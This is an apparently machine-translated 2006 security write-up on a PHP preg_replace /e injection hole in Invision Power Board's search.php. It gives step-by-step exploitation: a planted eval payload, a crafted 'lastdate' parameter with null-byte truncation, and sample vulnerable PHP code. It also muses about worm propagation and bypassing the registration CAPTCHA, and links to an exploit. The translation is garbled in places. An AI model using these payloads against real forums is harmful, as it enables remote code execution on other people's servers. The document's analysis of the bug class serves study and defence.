ipb search.php vulnerability analysis and thinking-vulnerability warning-the black bar safety net

2007-02-13T00:00:00
ID MYHACK58:62200714214
Type myhack58
Reporter 佚名
Modified 2007-02-13T00:00:00

Description

ipb search.php vulnerability analysis and thinking

###########################################

A vulnerability model may unearth a batch of vulnerabilities Idea is the most important preg_replace+/e

###########################################

Author: SuperHei_[At]_ph4nt0m.org Blog: http://superhei.blogbus.com/ Team: http://www.ph4nt0m.org Data: 2006-04-27

#######

Simple analysis###

#######

The vulnerability is another one of preg_replace+/e vulnerability,代码 在 \sources\action_admin\search.php line 1 2 5 8-1 2 6 a 2:

if ( $this->ipsclass->input['lastdate'] ) { $this->output = preg_replace( "#(value=[\"']{$this->ipsclass->input['lastdate']}[\"'])#i", "\\1

selected='selected'", $this->output );

} }

By the variable input['lastdate']injected/e, $this->output the injected shellcode is.

#######

Use method###

#######

To register a user, send a patch[shellcode]as follows: [

superheixxxxxxxeval(phpinf0()); //

Note that the last of the;and//between a space

Then click the"Search"--->Search by Keywords: superheixxxxxxxeval [remember to choose Show results as posts ]

You can get searchid http://127.0.0.1/ipb215/upload/inde..._in=posts&resul

t_type=posts&highlite=superheixxxxxxxeval

Then later added a& lastdate=z|eval.*?% 2 0//)%23e%0 0 that is, [/e]submit ok:

http://127.0.0.1/ipb215/upload/inde..._in=posts&resul

t_type=posts&highlite=superheixxxxxxxeval&lastdate=z|eval.*?% 2 0//)%23e%0 0

#######

Analysis of discussion###

#######
  1. Reference: Simple analysis: The vulnerability is another one of preg_replace+/e vulnerability,代码 在 \sources\action_admin\search.php line 1 2 5 8-1 2 6 a 2:

if ( $this->ipsclass->input['lastdate'] ) { $this->output = preg_replace( "#(value=[\"']{$this->ipsclass->input['lastdate']}[\"'])#i", "\\1

selected='selected'", $this->output );

} }

By the variable input['lastdate']injected/e, $this->output the injected shellcode is.

This analysis, out an important detail: preg_replace+/e there are 3 parameters, only the first 2 parameters in the code can only be executed, but the above statement seems to be the 3 parameters submitted

The,in fact, note that the above preg_replace in the first 2 parameters:\\1 selected='selected' inside\\1 is the first parameter in the regular expression try matching the value. In the final analysis

We submitted the shellcode is still on the first 2 parameters to perform.

  1. Reference:note that the last of the;and//between a space

This again is why? Because we submitted lastdate=z|eval.*?% 2 0//)%23e%0 0. is space+//for the flag, so we submitted the shellcode must also have a space+//

  1. preg_replace presence of null truncation vulnerability????

I think this should be regarded as php itself one of the vulnerabilities[before the include of null truncation vulnerability], we test the above vulnerability and write a simple model: <? $a=$_GET[a]; echo preg_replace("#(value=[\"']z|eval.*?//)# e{$a}[\"'])#i","\\1 ","heigegegxxxxxxxeval(phpinfo());//"); ?& gt;

We directly submitted http://127.0.0.1/test2. php? a=2 error: Warning: Unknown modifier '2' in d:\easyphp\www\test2.php on line 3

Submitted http://127.0.0.1/test2. php? a=%0 0 2 then execute phpinfo(). We successfully truncated. Model code-execution environment that requires gpc=off, but in many of the web application is

After a variable encoding and decoding in the implementation, so is not affected by gpc of the impact of the above ipb can at gpc=on the case of truncation.

4."lastdate=z|eval.*?% 2 0//)%23e%0 0"construction Mainly in this->output in the eval and%2 0//to flag to take the\\1 for the execution of the php code.

  1. worm use? Remember the Santy? Is the use of phpbb in a preg_replace here will be exploited? ipb this exploits must be landing, but in the ipb registration when there is a"picture

Authentication", but it is said that this can write a program to read out the?? As long as the breakthrough this worm is possible, after all ipb users have so much......

#######

Summary of the model###

#######
  1. Directly in the preg_replace the first 2 variables execution mode: <? echo preg_replace("/test/e",$h,"jutst test"); ?& gt; Submitted http://127.0.0.1/test/1 1/preg. php? h=phpinfo() Examples such as: phpbb viewtopic. php variable$highliht_match submit php code execution vulnerability

  2. By\\1[or\\n]extracts the first 3 variables in the php code and execution mode: <? echo preg_replace("/\s\php\\ [\/php\]\s/ies", "\\1", $h); ?& gt; Submitted to: http://127.0.0.1/test/11/preg.php?h=Codz: phpinfo()

Reference: r57 exp: the http://www.milw0rm.com/exploits/1720 More information: http://www.google.com